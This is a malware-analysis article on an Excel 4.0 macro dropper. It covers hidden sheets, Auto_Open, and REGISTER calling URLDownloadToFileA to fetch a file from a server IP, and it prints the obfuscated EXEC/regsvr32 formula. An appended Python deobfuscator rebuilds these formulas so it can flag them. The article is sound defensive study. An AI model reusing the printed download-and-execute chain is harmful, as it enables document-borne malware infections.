Excel 4.0 Macro Malware — old feature but can be harmful
This article introduces the functionality of Excel 4.0 macros together with a couple of detection techniques.
The first and most common detection technique for Excel 4.0 macros is checking for hidden sheets. In the picture below we can see the “Unhide” option, which lists all the hidden sheets:
After choosing “Unhide”, we can see all the sheets hidden inside the malicious workbook.
Now let’s take a deeper look at the functionality of the malicious Excel 4.0 macro. The first sheet contains the Auto_Open function, as we can see in figure 5. The purpose of Auto_Open is to run your code automatically as soon as Excel opens the workbook.
Clicking on the Auto_Open function jumps to cell G1 on a sheet called “Tiposa”. Looking further down column G, we can see the first use of Excel 4.0 macro functions, which download a malicious file from cell G25.
The REGISTER function registers the specified dynamic link library (DLL) or code resource and returns the register ID. You can also specify a custom function name and argument names that will appear in the Paste Function dialog box.
By removing the quotes and ampersands inside the REGISTER function we can see all the arguments clearly:
REGISTER is used here with the URLDownloadToFileA API function, which downloads data from the Internet and saves it to a file on the victim’s machine. URLDownloadToFileA is exported by urlmon.dll. Let’s list all the arguments of the REGISTER function:
URLMON = which DLL to load.
URLDownloadToFileA = which function to call from the chosen DLL.
D20 = "JJCCBB" (the data type string used to call the API).
Drwrgdfghfhf = custom name (the function will be called by this new name: "=Drwrgdfghfhf()").
D22 = 1 (Category).
D23 = 9 (Category).
Now we will see the use of the custom-named function “Drwrgdfghfhf”. The adversary downloads the malware from a malicious server over HTTP.
As we can see here, the malware uses some evasion techniques. Let’s remove the quotes and ampersands to see all the arguments:
Drwrgdfghfhf = the custom name of the REGISTER function that we saw in figure 6.
Tiposa!E21 = "184.108.40.206/".
Tiposa1!G11 = a random number between 213214234 (bottom) and 9776980793567560 (top), generated with the RANDBETWEEN() function.
Sheet2!K12 = ".dat".
A little information about Tiposa!E21, Tiposa1!G11 and Sheet2!K12: this syntax refers to a specific cell on a specific sheet inside the Excel file. For example, Tiposa1!G11 goes to the sheet named “Tiposa1” and imports the content of cell G11.
The RANDBETWEEN() function returns a random integer between the numbers you specify. A new random integer is returned every time the worksheet is calculated.
After concatenating all the arguments, we can see in figure 7 how the malware downloads a DAT file from the malicious server over HTTP and saves it as “C:\ProgramData\VDscytujyctfjkvu1.ocx”, i.e. with a new extension (OCX).
The last part of the Excel 4.0 macro is the file execution. The malware uses the EXEC function to run the malicious OCX file.
The EXEC() function starts a separate program. Use EXEC to start other programs with which you want to communicate.
=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")
E19 = T(E20&E21) = "regs"
regsvr32 is a command-line utility in Microsoft Windows and ReactOS for registering and unregistering DLLs and ActiveX controls in the operating system Registry (Wikipedia).
An OCX file is an ActiveX control. The adversary used this method to register an OCX file with the command-line utility Regsvr32. Now the malware (the OCX file) is running on the victim’s machine.
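As an added example (not code from the article), here is a small Python deobfuscator that automates the manual cleanup of quotes and ampersands done above: it resolves cell references such as E19 = T(E20&E21), merges the "re"&"gs" fragments, and lists the suspicious names (REGISTER, URLMON, EXEC, regsvr32) that remain. The sheet name Macro1 and the cell values are constructed placeholders modelled on the article, not the sample's real contents.

```python
import re
# Names the article walks through; any of them after deobfuscation is a red flag.
INDICATORS = ("REGISTER", "URLDOWNLOADTOFILE", "URLMON", "EXEC", "REGSVR32", "AUTO_OPEN")
LITERAL = re.compile(r'"[^"]*"')                          # one XLM string literal
CELLREF = re.compile(r"\b(?:(\w+)!)?([A-Z]{1,3}\d+)\b")  # E19, Sheet2!K12
TCALL = re.compile(r'\bT\("([^"]*)"\)')                   # T("x") -> "x"

# Constructed mini-workbook modelled on the article (hypothetical sheet name, placeholder values).
CELLS = {
    "Macro1!D20": "JJCCBB", "Macro1!D21": "Drwrgdfghfhf",
    "Macro1!E20": "re", "Macro1!E21": "gs", "Macro1!E19": "=T(E20&E21)",
    "Macro1!G1": '=REGISTER("URL"&"MON","URLDownload"&"ToFileA",D20,D21,,1,9)',
    "Macro1!G25": '=EXEC(E19&"vr32 C"&":\\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\\VDscytujyctfjkvu1.ocx")',
}

def resolve(cells, sheet, ref):
    """Text of 'E19' or 'Sheet2!K12' seen from `sheet`; formula cells resolve recursively."""
    if "!" in ref:
        sheet, ref = ref.split("!", 1)
    value = str(cells.get("%s!%s" % (sheet, ref), ""))
    if not value.startswith("="):
        return value
    text = deobfuscate(cells, sheet, value)[1:]              # drop the '='
    return text[1:-1] if LITERAL.fullmatch(text) else text   # a reference loop raises RecursionError

def merge_fragments(text):
    """Join string literals separated only by '&' ("re"&"gs" -> "regs")."""
    out, pos = [], 0
    for lit in LITERAL.finditer(text):
        gap = text[pos:lit.start()]
        if out and gap.strip() == "&" and out[-1].endswith('"'):
            out[-1] = out[-1][:-1] + lit.group(0)[1:]         # drop both quotes
        else:
            out += [gap, lit.group(0)]
        pos = lit.end()
    return "".join(out) + text[pos:]

def deobfuscate(cells, sheet, formula):
    """Substitute cell refs (outside string literals only), merge fragments, fold T("x")."""
    sub = lambda m: '"%s"' % resolve(cells, sheet, m.group(0))
    out, pos = [], 0
    for lit in LITERAL.finditer(formula):
        out += [CELLREF.sub(sub, formula[pos:lit.start()]), lit.group(0)]
        pos = lit.end()
    out.append(CELLREF.sub(sub, formula[pos:]))
    return TCALL.sub(r'"\1"', merge_fragments("".join(out)))

def indicators(text):
    """Suspicious function/binary names present in a deobfuscated formula."""
    return [i for i in INDICATORS if i in text.upper()]
```

Running deobfuscate over G25 yields =EXEC("regsvr32 C:\ProgramData\VDscytujyctfjkvu1.ocx"), which indicators() flags for EXEC and REGSVR32; the same pass over G1 exposes REGISTER, URLMON and URLDownloadToFileA.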
The Excel 4.0 macro (XLM macro) is an old feature that Microsoft introduced in 1992. This technique is a different way to execute malicious code through an Office document. Beware: not only VBA code can compromise your machine.